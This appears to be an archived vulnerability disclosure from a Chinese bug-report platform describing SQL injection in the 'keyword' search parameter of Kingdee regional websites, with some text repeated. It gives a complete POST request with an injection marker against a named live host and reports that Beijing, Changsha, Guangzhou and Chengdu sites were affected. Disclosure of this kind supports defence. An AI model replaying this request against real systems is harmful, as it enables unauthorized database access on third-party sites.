VULHUB ™

### 简要描述： 。。。 ### 详细说明： post信息 ``` POST /search/result.html HTTP/1.1 Content-Length: 81 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://城市名字的拼音（如：changsha）.kingdee.com:80/ Cookie: JSESSIONID=E6378EC01F85A8F831AF10BEF726DAF5 Host: changsha.kingdee.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Accept: */* keyword=DZzEADNN');*&Submit=%e6%90%9c%e7%b4%a2 ``` keyword存在注入。 [<img src="https://images.seebug.org/upload/201312/17202534cb942a9fe4bd0e711db47c30fd71894e.jpg" alt="aa00.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/17202534cb942a9fe4bd0e711db47c30fd71894e.jpg) 边上的这些地区网站都挂了，基本上木有活口（好像都用的是这套系统）。 [<img src="https://images.seebug.org/upload/201312/17202818a593e95b2583d026eefc3a62eb9faa52.jpg" alt="cs00.jpg" width="600"...

### 简要描述： 。。。 ### 详细说明： post信息 ``` POST /search/result.html HTTP/1.1 Content-Length: 81 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://城市名字的拼音（如：changsha）.kingdee.com:80/ Cookie: JSESSIONID=E6378EC01F85A8F831AF10BEF726DAF5 Host: changsha.kingdee.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Accept: */* keyword=DZzEADNN');*&Submit=%e6%90%9c%e7%b4%a2 ``` keyword存在注入。 [<img src="https://images.seebug.org/upload/201312/17202534cb942a9fe4bd0e711db47c30fd71894e.jpg" alt="aa00.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/17202534cb942a9fe4bd0e711db47c30fd71894e.jpg) 边上的这些地区网站都挂了，基本上木有活口（好像都用的是这套系统）。 [<img src="https://images.seebug.org/upload/201312/17202818a593e95b2583d026eefc3a62eb9faa52.jpg" alt="cs00.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/17202818a593e95b2583d026eefc3a62eb9faa52.jpg) 长沙挂了。 [<img src="https://images.seebug.org/upload/201312/1720293625c83c40f8b30bc838b7425317396af9.jpg" alt="bj00.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/1720293625c83c40f8b30bc838b7425317396af9.jpg) 北京ok了。 [<img src="https://images.seebug.org/upload/201312/1720345492318073bbdd81d29ee20ec8690a678b.jpg" alt="gz.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/1720345492318073bbdd81d29ee20ec8690a678b.jpg) 广州哦也。 [<img src="https://images.seebug.org/upload/201312/17203108b1169e5679902b34fe5b17362432bd28.jpg" alt="cd00.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/17203108b1169e5679902b34fe5b17362432bd28.jpg) 成都来了，不继续测了。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201312/1720331855fd21557e9650a5ef8e108752c178ce.jpg" alt="zm.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/1720331855fd21557e9650a5ef8e108752c178ce.jpg)